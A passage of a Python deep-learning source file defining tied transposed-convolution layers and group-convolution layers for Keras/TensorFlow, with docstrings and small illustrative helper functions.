return NEW_CONV_TRANSPOSE
_check_dl_func = lambda a: all(ai==1 for ai in a)
class Conv1DTied(Conv2DTranspose):
"""Tied convolution layer (sometimes called Deconvolution).
Compared to `Conv1DTranspose`, this implementation requires a `Conv1D`
layer to provide the kernel, which is used as the kernel for the
transposed convolution. As a result, this implementation is a symmetric
counterpart of the provided layer.
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 3)` for 128 length vector
in `data_format="channels_last"`.
NOTE THAT ALTHOUGH WE HAVE SUCCEEDED IN MAKING THIS LAYER SERIALIZABLE,
IT MAY STILL BE PROBLEMATIC FOR THE TRAINING ALGORITHM. PLEASE BE CAREFUL
WHEN USING THIS KIND OF LAYER.
IN MULTIPLE MODELS, THIS INSTANCE MAY CAUSE CONFLICTS BECAUSE IT
USES A GLOBAL VARIABLE NAME TO SERIALIZE CROSSED LAYERS. IT IS
RECOMMENDED TO SEPARATE NAME SCOPES WHEN USING MULTIPLE MODELS.
Arguments:
padding: one of `"valid"` or `"same"` (case-insensitive).
output_padding: An integer or tuple/list of 1 integers,
specifying the amount of padding along the height and width
of the output tensor.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
bias_initializer: Initializer for the bias vector.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
bias_constraint: Constraint function applied to the bias vector.
Reserved arguments:
varName, filters, kernel_size, strides, data_format,
dilation_rate: only used when saving and restoring the layer.
Input shape:
3D tensor with shape:
`(batch, channels, steps)` if data_format='channels_first'
or 3D tensor with shape:
`(batch, steps, channels)` if data_format='channels_last'.
Output shape:
3D tensor with shape:
`(batch, filters, new_steps)` if data_format='channels_first'
or 3D tensor with shape:
`(batch, new_steps, filters)` if data_format='channels_last'.
`new_steps` values might have changed due to padding.
"""
def __init__(self,
tied_layer='',
padding='valid',
output_padding=None,
activation=None,
use_bias=True,
bias_initializer='zeros',
bias_regularizer=None,
activity_regularizer=None,
bias_constraint=None,
varName='',
filters=None,
kernel_size=1,
strides=1,
data_format=None,
dilation_rate=1,
**kwargs):
# Reserved variables
if tied_layer != '':
self.kernelFrom = tied_layer.kernel.name
data_format = tied_layer.data_format
strides = (1, *tied_layer.strides)
dilation_rate = (1, *tied_layer.dilation_rate)
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
bias_initializer=initializers.get(bias_initializer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.output_padding = output_padding
if output_padding is not None:
if isinstance(output_padding, (list, tuple)) and len(output_padding) == 2:
self.output_padding = output_padding
else:
output_padding = conv_utils.normalize_tuple(output_padding, 1, 'output_padding')
self.output_padding = (1, *output_padding)
self.varName = varName
self.input_spec = InputSpec(ndim=3)
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if len(input_shape) != 3:
raise ValueError('Inputs should have rank 3. Received input shape: ' + str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
self.get_channels_first = True
else:
channel_axis = -1
self.get_channels_first = False
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = int(input_shape[channel_axis])
self.input_spec = InputSpec(ndim=3, axes={channel_axis: input_dim})
if self.varName == '':
kernelFrom = list(filter(lambda v: v.name == self.kernelFrom, variables.global_variables()))[0]
else:
kernelFrom = list(filter(lambda v: v.name == self.varName, variables.global_variables()))[0]
self.kernel = K.expand_dims(kernelFrom, axis=0)
# Save/Load information from tied layer (or database).
if self.varName == '':
kernel_shape = self.kernel.get_shape().as_list()
self.varName = kernelFrom.name
self.kernel_size = kernel_shape[:2]
self.filters = kernel_shape[2]
if self.output_padding is not None:
for stride, out_pad in zip(self.strides, self.output_padding):
if out_pad >= stride:
raise ValueError('Stride ' + str(self.strides) + ' must be '
'greater than output padding ' +
str(self.output_padding))
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def call(self, inputs):
if self.get_channels_first:
r2_inputs = K.expand_dims(inputs, axis=2)
get_r2_out = super(Conv1DTied, self).call(r2_inputs)
return K.squeeze(get_r2_out, axis=2)
else:
r2_inputs = K.expand_dims(inputs, axis=1)
get_r2_out = super(Conv1DTied, self).call(r2_inputs)
return K.squeeze(get_r2_out, axis=1)
def get_config(self):
config = super(Conv1DTied, self).get_config()
config['varName'] = self.varName
config['tied_layer'] = ''
return config
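The output length of the tied transposed layers follows the standard deconvolution formula. Below is a minimal pure-Python sketch of that rule (a hypothetical helper mirroring the usual `deconv_output_length` behavior for `'valid'`/`'same'`; it is not used by the layers themselves):

```python
def deconv_output_length(length, kernel_size, padding, stride, output_padding=None):
    """Infer one spatial dimension of a transposed-convolution output."""
    if output_padding is None:
        if padding == 'valid':
            return length * stride + max(kernel_size - stride, 0)
        return length * stride  # 'same'
    # With an explicit output_padding the shape is no longer inferred:
    pad = kernel_size // 2 if padding == 'same' else 0
    return (length - 1) * stride + kernel_size - 2 * pad + output_padding

# Upsampling a length-4 signal with kernel 3 and stride 2:
# 'valid' -> 9, 'same' -> 8.
```

Note that `output_padding` must stay below the stride, which is exactly what the `build` methods above enforce.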
class Conv2DTied(Conv2DTranspose):
"""Tied convolution layer (sometimes called deconvolution).
Compared to `Conv2DTranspose`, this implementation requires a `Conv2D`
layer to provide the kernel that is used for the transposed
convolution. As a result, this layer is the symmetric counterpart of
the provided layer.
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Note: although this layer has been made serializable, it may still be
problematic for the training algorithm, so use such layers with care.
When used in multiple models, an instance may cause conflicts because
it serializes tied layers by their global variable names; it is
recommended to use separate name scopes for different models.
Arguments:
padding: one of `"valid"` or `"same"` (case-insensitive).
output_padding: An integer or tuple/list of 2 integers,
specifying the amount of padding along the height and width
of the output tensor.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
bias_initializer: Initializer for the bias vector.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
bias_constraint: Constraint function applied to the bias vector.
Reserved arguments:
varName, filters, kernel_size, strides, data_format,
dilation_rate: only used when saving and restoring the layer.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
tied_layer='',
padding='valid',
output_padding=None,
activation=None,
use_bias=True,
bias_initializer='zeros',
bias_regularizer=None,
activity_regularizer=None,
bias_constraint=None,
varName='',
filters=None,
kernel_size=1,
strides=1,
data_format=None,
dilation_rate=1,
**kwargs):
# Reserved variables
if tied_layer != '':
self.kernelFrom = tied_layer.kernel.name
data_format = tied_layer.data_format
strides = tied_layer.strides
dilation_rate = tied_layer.dilation_rate
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
bias_initializer=initializers.get(bias_initializer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.output_padding = output_padding
if self.output_padding is not None:
self.output_padding = conv_utils.normalize_tuple(self.output_padding, 2, 'output_padding')
self.varName = varName
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if len(input_shape) != 4:
raise ValueError('Inputs should have rank 4. Received input shape: ' + str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = int(input_shape[channel_axis])
self.input_spec = InputSpec(ndim=4, axes={channel_axis: input_dim})
if self.varName == '':
kernelFrom = list(filter(lambda v: v.name == self.kernelFrom, variables.global_variables()))[0]
else:
kernelFrom = list(filter(lambda v: v.name == self.varName, variables.global_variables()))[0]
self.kernel = kernelFrom
# Save/Load information from tied layer (or database).
if self.varName == '':
kernel_shape = self.kernel.get_shape().as_list()
self.varName = kernelFrom.name
self.kernel_size = kernel_shape[:2]
self.filters = kernel_shape[2]
if self.output_padding is not None:
for stride, out_pad in zip(self.strides, self.output_padding):
if out_pad >= stride:
raise ValueError('Stride ' + str(self.strides) + ' must be '
'greater than output padding ' +
str(self.output_padding))
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def get_config(self):
config = super(Conv2DTied, self).get_config()
config['varName'] = self.varName
config['tied_layer'] = ''
return config
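The tied layers restore their kernel by matching the recorded global variable name against the graph's variable collection, which is why separate name scopes matter when multiple models are built. The lookup amounts to the following (a hypothetical standalone helper; `candidates` stands in for `variables.global_variables()`):

```python
def find_by_name(candidates, name):
    """Return the first object whose `.name` attribute equals `name`."""
    matches = [v for v in candidates if v.name == name]
    if not matches:
        raise ValueError('No variable named {0!r} was found; keep tied '
                         'layers in the same graph/name scope.'.format(name))
    return matches[0]
```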
class Conv3DTied(Conv3DTranspose):
"""Tied convolution layer (sometimes called deconvolution).
Compared to `Conv3DTranspose`, this implementation requires a `Conv3D`
layer to provide the kernel that is used for the transposed
convolution. As a result, this layer is the symmetric counterpart of
the provided layer.
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 3)` for a 128x128x128 volume with 3 channels
if `data_format="channels_last"`.
Note: although this layer has been made serializable, it may still be
problematic for the training algorithm, so use such layers with care.
When used in multiple models, an instance may cause conflicts because
it serializes tied layers by their global variable names; it is
recommended to use separate name scopes for different models.
Arguments:
padding: one of `"valid"` or `"same"` (case-insensitive).
output_padding: An integer or tuple/list of 3 integers,
specifying the amount of padding along the depth, height, and
width.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
Reserved arguments:
varName, filters, kernel_size, strides, data_format:
only used when saving and restoring the layer.
Input shape:
5D tensor with shape:
`(batch, channels, depth, rows, cols)` if data_format='channels_first'
or 5D tensor with shape:
`(batch, depth, rows, cols, channels)` if data_format='channels_last'.
Output shape:
5D tensor with shape:
`(batch, filters, new_depth, new_rows, new_cols)` if
data_format='channels_first'
or 5D tensor with shape:
`(batch, new_depth, new_rows, new_cols, filters)` if
data_format='channels_last'.
`depth` and `rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
tied_layer='',
padding='valid',
output_padding=None,
activation=None,
use_bias=True,
bias_initializer='zeros',
bias_regularizer=None,
activity_regularizer=None,
bias_constraint=None,
varName='',
filters=None,
kernel_size=1,
strides=1,
data_format=None,
**kwargs):
# Reserved variables
if tied_layer != '':
self.kernelFrom = tied_layer.kernel.name
data_format = tied_layer.data_format
strides = tied_layer.strides
super(Conv3DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
bias_initializer=initializers.get(bias_initializer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.output_padding = output_padding
if self.output_padding is not None:
self.output_padding = conv_utils.normalize_tuple(self.output_padding, 3, 'output_padding')
self.varName = varName
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if len(input_shape) != 5:
raise ValueError('Inputs should have rank 5. Received input shape: ' + str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined, found None: ' + str(input_shape))
input_dim = int(input_shape[channel_axis])
self.input_spec = InputSpec(ndim=5, axes={channel_axis: input_dim})
if self.varName == '':
kernelFrom = list(filter(lambda v: v.name == self.kernelFrom, variables.global_variables()))[0]
else:
kernelFrom = list(filter(lambda v: v.name == self.varName, variables.global_variables()))[0]
self.kernel = kernelFrom
# Save/Load information from tied layer (or database).
if self.varName == '':
kernel_shape = self.kernel.get_shape().as_list()
self.varName = kernelFrom.name
self.kernel_size = kernel_shape[:3]
self.filters = kernel_shape[3]
if self.output_padding is not None:
for stride, out_pad in zip(self.strides, self.output_padding):
if out_pad >= stride:
raise ValueError('Stride ' + str(self.strides) + ' must be '
'greater than output padding ' +
str(self.output_padding))
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def get_config(self):
config = super(Conv3DTied, self).get_config()
config['varName'] = self.varName
config['tied_layer'] = ''
return config
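All three tied layers share one idea: the decoder reuses the encoder's kernel instead of creating and training its own. The dense (fully connected) analogue of this weight tying can be sketched in pure Python (hypothetical helpers, not part of the layer API):

```python
def matvec(w, x):
    # w is a list of rows (an m x n matrix), x a length-n vector.
    return [sum(wi * xi for wi, xi in zip(row, x)) for row in w]

def tied_autoencode(w, x):
    h = matvec(w, x)                     # encode: h = W x
    wt = [list(col) for col in zip(*w)]  # decoder kernel is W^T; no new weights
    return matvec(wt, h)                 # decode: x' = W^T h
```

The convolutional layers above do the same thing with the tied layer's `kernel` variable, fetched by name at build time.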
class _GroupConv(Layer):
"""Abstract nD group convolution layer (private, used as implementation base).
This layer creates a convolution kernel that is convolved
(actually cross-correlated) with the layer input to produce a tensor of
outputs. If `use_bias` is True (and a `bias_initializer` is provided),
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
Different from plain `Conv` layers, `GroupConv` divides the input channels
into several groups and applies an ordinary (dense) convolution within each
group. The convolution inside each group is dense, while the convolutions
of different groups are independent of each other.
Arguments:
rank: An integer, the rank of the convolution, e.g. "2" for 2D convolution.
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality of each latent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of n integers, specifying the
length of the convolution window.
strides: An integer or tuple/list of n integers,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: One of `"valid"`, `"same"`, or `"causal"` (case-insensitive).
data_format: A string, one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, ..., channels)` while `channels_first` corresponds to
inputs with shape `(batch, channels, ...)`.
dilation_rate: An integer or tuple/list of n integers, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
activation: Activation function. Set it to None to maintain a
linear activation.
use_bias: Boolean, whether the layer uses a bias.
kernel_initializer: An initializer for the convolution kernel.
bias_initializer: An initializer for the bias vector. If None, the default
initializer will be used.
kernel_regularizer: Optional regularizer for the convolution kernel.
bias_regularizer: Optional regularizer for the bias vector.
activity_regularizer: Optional regularizer function for the output.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
bias_constraint: Optional projection function to be applied to the
bias after being updated by an `Optimizer`.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
"""
def __init__(self, rank,
lgroups,
lfilters,
kernel_size,
strides=1,
padding='valid',
data_format=None,
dilation_rate=1,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None,
**kwargs):
super(_GroupConv, self).__init__(
trainable=trainable,
name=name,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
self.rank = rank
self.lgroups = lgroups
self.lfilters = lfilters
self.kernel_size = conv_utils.normalize_tuple(
kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.padding == 'causal' and not isinstance(self, (Conv1D, SeparableConv1D)):
raise ValueError('Causal padding is only supported for `Conv1D` and `SeparableConv1D`.')
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(
dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.input_spec = InputSpec(ndim=self.rank + 2)
self.group_input_dim = None
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs should be defined. Found `None`.')
input_dim = int(input_shape[channel_axis])
if input_dim % self.lgroups != 0:
raise ValueError('To group the input channels, the number of input channels should be a multiple of the group number (N*{0}), but got {1}.'.format(self.lgroups, input_dim))
self.group_input_dim = input_dim // self.lgroups
kernel_shape = self.kernel_size + (self.group_input_dim, self.lfilters * self.lgroups)
self.kernel = self.add_weight(
name='kernel',
shape=kernel_shape,
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
trainable=True,
dtype=self.dtype)
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.lfilters * self.lgroups,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.input_spec = InputSpec(ndim=self.rank + 2, axes={channel_axis: input_dim})
if self.padding == 'causal':
op_padding = 'valid'
else:
op_padding = self.padding
# Create conv. op groups.
if self.data_format == 'channels_first':
group_input_shape = tensor_shape.TensorShape([input_shape[0], self.group_input_dim, *input_shape[2:]])
else:
group_input_shape = tensor_shape.TensorShape([*input_shape[:-1], self.group_input_dim])
group_kernel_shape = tensor_shape.TensorShape([*kernel_shape[:-1], self.lfilters])
self._convolution_op = nn_ops.Convolution(
group_input_shape,
filter_shape=group_kernel_shape,
dilation_rate=self.dilation_rate,
strides=self.strides,
padding=op_padding.upper(),
data_format=conv_utils.convert_data_format(self.data_format, self.rank + 2))
self.built = True
def call(self, inputs):
outputs_list = []
if self.data_format == 'channels_first':
for i in range(self.lgroups):
get_output = self._convolution_op(inputs[:,i*self.group_input_dim:(i+1)*self.group_input_dim, ...], self.kernel[..., i*self.lfilters:(i+1)*self.lfilters])
outputs_list.append(get_output)
outputs = array_ops.concat(outputs_list, 1)
else:
for i in range(self.lgroups):
get_output = self._convolution_op(inputs[..., i*self.group_input_dim:(i+1)*self.group_input_dim], self.kernel[..., i*self.lfilters:(i+1)*self.lfilters])
outputs_list.append(get_output)
outputs = array_ops.concat(outputs_list, -1)
if self.use_bias:
if self.data_format == 'channels_first':
if self.rank == 1:
# nn.bias_add does not accept a 1D input tensor.
bias = array_ops.reshape(self.bias, (1, self.lfilters * self.lgroups, 1))
outputs += bias
if self.rank == 2:
outputs = nn.bias_add(outputs, self.bias, data_format='NCHW')
if self.rank == 3:
# As of Mar 2017, direct addition is significantly slower than
# bias_add when computing gradients. To use bias_add, we collapse Z
# and Y into a single dimension to obtain a 4D input tensor.
outputs_shape = outputs.shape.as_list()
if outputs_shape[0] is None:
outputs_shape[0] = -1
outputs_4d = array_ops.reshape(outputs,
[outputs_shape[0], outputs_shape[1],
outputs_shape[2] * outputs_shape[3],
outputs_shape[4]])
outputs_4d = nn.bias_add(outputs_4d, self.bias, data_format='NCHW')
outputs = array_ops.reshape(outputs_4d, outputs_shape)
else:
outputs = nn.bias_add(outputs, self.bias, data_format='NHWC')
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape).as_list()
if self.data_format == 'channels_last':
space = input_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return tensor_shape.TensorShape([input_shape[0]] + new_space + [self.lfilters * self.lgroups])
else:
space = input_shape[2:]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return tensor_shape.TensorShape([input_shape[0], self.lfilters * self.lgroups] + new_space)
def get_config(self):
config = {
'lgroups': self.lgroups,
'lfilters': self.lfilters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(_GroupConv, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def _compute_causal_padding(self):
"""Calculates padding for 'causal' option for 1-d conv layers."""
left_pad = self.dilation_rate[0] * (self.kernel_size[0] - 1)
if self.data_format == 'channels_last':
causal_padding = [[0, 0], [left_pad, 0], [0, 0]]
else:
causal_padding = [[0, 0], [0, 0], [left_pad, 0]]
return causal_padding
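The per-group slicing that `call` performs can be illustrated with a plain-Python 1D group convolution for the `channels_last`, stride-1, `'valid'` case (a hypothetical sketch, independent of the layer code; each group convolves its own channel block and the group outputs are concatenated, mirroring the `array_ops.concat` above):

```python
def group_conv1d(x, kernels):
    """x: [steps][channels]; kernels: per-group, each [kw][group_in][lfilters]."""
    lgroups = len(kernels)
    gin = len(x[0]) // lgroups            # channels per group
    kw = len(kernels[0])                  # kernel width
    out = []
    for t in range(len(x) - kw + 1):      # 'valid' padding, stride 1
        row = []
        for g, kern in enumerate(kernels):
            for f in range(len(kern[0][0])):
                acc = 0.0
                for dt in range(kw):
                    for c in range(gin):
                        acc += x[t + dt][g * gin + c] * kern[dt][c][f]
                row.append(acc)           # concatenate group outputs
        out.append(row)
    return out
```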
class GroupConv1D(_GroupConv):
"""1D group convolution layer (e.g. temporal group convolution).
This layer creates a convolution kernel that is convolved
with the layer input over a single spatial (or temporal) dimension
to produce a tensor of outputs.
Different from plain `Conv` layers, `GroupConv` divides the input
channels into several groups and applies an ordinary (dense) convolution
within each group. The convolution inside each group is dense, while the
convolutions of different groups are independent of each other.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`,
it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide an `input_shape` argument
(tuple of integers or `None`), e.g.
`(10, 128)` for sequences of 10 vectors of 128 dimensions,
or `(None, 128)` for variable-length sequences of 128-dimensional vectors.
Arguments:
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality of each latent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: One of `"valid"`, `"causal"` or `"same"` (case-insensitive).
`"causal"` results in causal (dilated) convolutions, e.g. output[t]
does not depend on input[t+1:]. Useful when modeling temporal data
where the model should not violate the temporal order.
See [WaveNet: A Generative Model for Raw Audio, section
2.1](https://arxiv.org/abs/1609.03499).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
dilation_rate: an integer or tuple/list of a single integer, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
lgroups,
lfilters,
kernel_size,
strides=1,
padding='valid',
data_format='channels_last',
dilation_rate=1,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(GroupConv1D, self).__init__(
rank=1,
lgroups=lgroups,
lfilters=lfilters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def call(self, inputs):
if self.padding == 'causal':
inputs = array_ops.pad(inputs, self._compute_causal_padding())
return super(GroupConv1D, self).call(inputs)
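`GroupConv1D.call` handles `'causal'` padding by left-padding the time axis before the ordinary convolution, so `output[t]` never depends on `input[t+1:]`. The padding rule from `_compute_causal_padding` in isolation (hypothetical helpers, single-channel time series for simplicity):

```python
def causal_left_pad(kernel_size, dilation_rate=1):
    # All padding goes on the left (past) side of the time axis.
    return dilation_rate * (kernel_size - 1)

def pad_causal(x, kernel_size, dilation_rate=1, value=0.0):
    return [value] * causal_left_pad(kernel_size, dilation_rate) + list(x)
```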
class GroupConv2D(_GroupConv):
"""2D group convolution layer (e.g. spatial group convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of outputs.
Different from plain `Conv` layers, `GroupConv` divides the input
channels into several groups and applies an ordinary (dense) convolution
within each group. The convolution inside each group is dense, while the
convolutions of different groups are independent of each other.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
lgroups: Integer, the group number of the latent convolution branch. The
number of filters in the whole latent space is lgroups * lfilters.
lfilters: Integer, the dimensionality of each latent group (i.e. the
number of filters in each latent convolution branch).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
